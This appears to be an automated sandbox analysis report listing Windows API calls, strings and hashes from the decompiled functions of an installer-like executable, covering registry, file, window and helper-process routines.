                                                                                                                                        • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                                                                        • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                                                                        • Helper process exited., xrefs: 00458AC5
                                                                                                                                        • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                                                        • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                                                        • API String ID: 3355656108-1243109208
                                                                                                                                        • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                                                                        • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                                                                        • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                                                                        • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                                                                          • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                                                                        • RegCreateKeyEx, xrefs: 004545C3
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                                                                        • , xrefs: 004545B1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFormatMessageQueryValue
                                                                                                                                        • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                        • API String ID: 2481121983-1280779767
                                                                                                                                        • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                                                        • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                                                                        • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                                                        • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                                                          • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                                                                        • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                                                                        • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                                                                          • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                                                        • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                                                        • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                                                        • API String ID: 1549857992-2312673372
                                                                                                                                        • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                                                        • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                                                                        • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                                                        • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                                                                        • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                                                                        • API String ID: 4190037839-2312295185
                                                                                                                                        • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                                                        • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                                                                        • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                                                        • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                                                                        APIs
                                                                                                                                        • GetActiveWindow.USER32 ref: 004629FC
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                                                                        • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                        • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                        • API String ID: 2610873146-3407710046
                                                                                                                                        • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                                                        • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                                                                        • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                                                        • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                                                                        APIs
                                                                                                                                        • GetActiveWindow.USER32 ref: 0042F194
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                                                                        • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                        • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                        • API String ID: 2610873146-3407710046
                                                                                                                                        • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                                                        • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                                                                        • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                                                        • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,021D3858,00000000), ref: 00458C79
                                                                                                                                        • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021D3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                                                                        • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021D3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                                                                        • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021D3858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021D3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                                                        • String ID: CreateEvent$TransactNamedPipe
                                                                                                                                        • API String ID: 2182916169-3012584893
                                                                                                                                        • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                                                        • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                                                                        • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                                                        • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                                                                        • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                                                        • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                                                        • API String ID: 1914119943-2711329623
                                                                                                                                        • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                                                        • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                                                                        • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                                                        • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                                                                        APIs
                                                                                                                                        • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                                                                        • SaveDC.GDI32(?), ref: 00416E27
                                                                                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                                                                        • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                                                                        • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00416F22
                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                                                                        • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 375863564-0
                                                                                                                                        • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                                                        • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                                                                        • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                                                        • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                                                        • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1694776339-0
                                                                                                                                        • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                        • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                                                        • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                        • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                                                                        • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                                                                        • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                                                                        • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                                                                        • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                                                                        • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                                                                        • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                                                                        • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Delete$EnableItem$System
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3985193851-0
                                                                                                                                        • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                                                        • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                                                                        • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                                                        • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                                                                        • SendNotifyMessageA.USER32(00010438,00000496,00002710,00000000), ref: 00481A97
                                                                                                                                        Strings
                                                                                                                                        • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                                                                        • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                                                                        • Restarting Windows., xrefs: 00481A72
                                                                                                                                        • Deinitializing Setup., xrefs: 00481872
                                                                                                                                        • DeinitializeSetup, xrefs: 0048190D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
